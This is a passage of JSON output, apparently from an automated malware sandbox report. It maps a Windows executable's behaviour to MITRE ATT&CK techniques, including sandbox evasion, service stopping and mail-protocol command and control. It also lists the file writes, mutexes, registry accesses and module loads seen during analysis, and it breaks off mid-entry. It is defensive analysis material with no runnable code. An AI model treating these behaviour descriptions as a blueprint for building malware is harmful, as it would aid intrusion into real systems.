"informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jaigqlsg.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"KERNEL32.DLL\" at base 75830000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"WS2_32.DLL\" at base 75970000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"DBGHELP.DLL\" at base 6f900000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"USER32.DLL\" at base 77390000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"ADVAPI32.DLL\" at base 75d50000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"SHELL32.DLL\" at base 76320000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"MSVCR100.DLL\" at base 6a2b0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"NTDLL.DLL\" at base 774e0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"OLE32.DLL\" at base 75ec0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"CRYPTBASE.DLL\" at base 752e0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74030000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"PROPSYS.DLL\" at base 74160000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"COMCTL32.DLL\" at base 742e0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"APPHELP.DLL\" at base 75290000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"CLBCATQ.DLL\" at base 760f0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a510000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74160000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"NTMARTA.DLL\" at base 74850000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75830000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"SETUPAPI.DLL\" at base 76180000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"RPCRT4.DLL\" at base 75c40000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77370000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"PROFAPI.DLL\" at base 753f0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75710000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76f70000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"SECUR32.DLL\" at base 75120000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 756b0000\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75290000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71120000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75830000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b970000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 776e0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75bf0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71120000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 75830000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b970000\n \"jaigqlsg.exe\" loaded module \"GDI32.DLL\" at base 776e0000\n \"jaigqlsg.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75bf0000\n \"jaigqlsg.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71120000\n \"jaigqlsg.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jaigqlsg.exe\" loaded module \"KERNEL32\" at base 75830000\n \"jaigqlsg.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jaigqlsg.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b970000\n \"jaigqlsg.exe\" loaded module \"KERNEL32.DLL\" at base 75830000\n \"jaigqlsg.exe\" loaded module \"WS2_32.DLL\" at base 75970000\n \"jaigqlsg.exe\" loaded module \"DBGHELP.DLL\" at base 6f900000\n \"jaigqlsg.exe\" loaded module \"USER32.DLL\" at base 77390000\n \"jaigqlsg.exe\" loaded module \"ADVAPI32.DLL\" at base 75d50000\n \"jaigqlsg.exe\" loaded module \"SHELL32.DLL\" at base 76320000\n \"jaigqlsg.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000\n \"jaigqlsg.exe\" loaded module \"MSVCR100.DLL\" at base 6a2b0000\n \"jaigqlsg.exe\" loaded module \"SSPICLI.DLL\" at base 75270000\n \"jaigqlsg.exe\" loaded module \"RPCRT4.DLL\" at base 75c40000\n \"jaigqlsg.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77370000\n \"jaigqlsg.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75290000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6cb90000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 75830000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6c050000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6a0e0000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6a080000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75830000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6bf50000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69c20000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6bf30000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6b7e0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6a3b0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 69c00000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 68610000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 6a310000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 75c40000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 65200000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6a2c0000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 685e0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 65040000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6a2b0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 64f90000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75ec0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 752e0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74030000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74df0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 77390000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 760f0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c1a0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 75d50000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77370000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77370000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77370000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77370000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74b80000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75380000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6e5b0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 756c0000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 749c0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74ac0000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 77640000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71120000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 75830000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b970000\n \"svchost.exe\" loaded module \"KERNEL32.DLL\" at base 75830000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 774e0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73750000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 735d0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75c40000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73660000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73c60000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73370000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77370000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73200000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74db0000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74c70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73350000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75970000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73680000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71a30000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 75270000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77370000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74910000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called 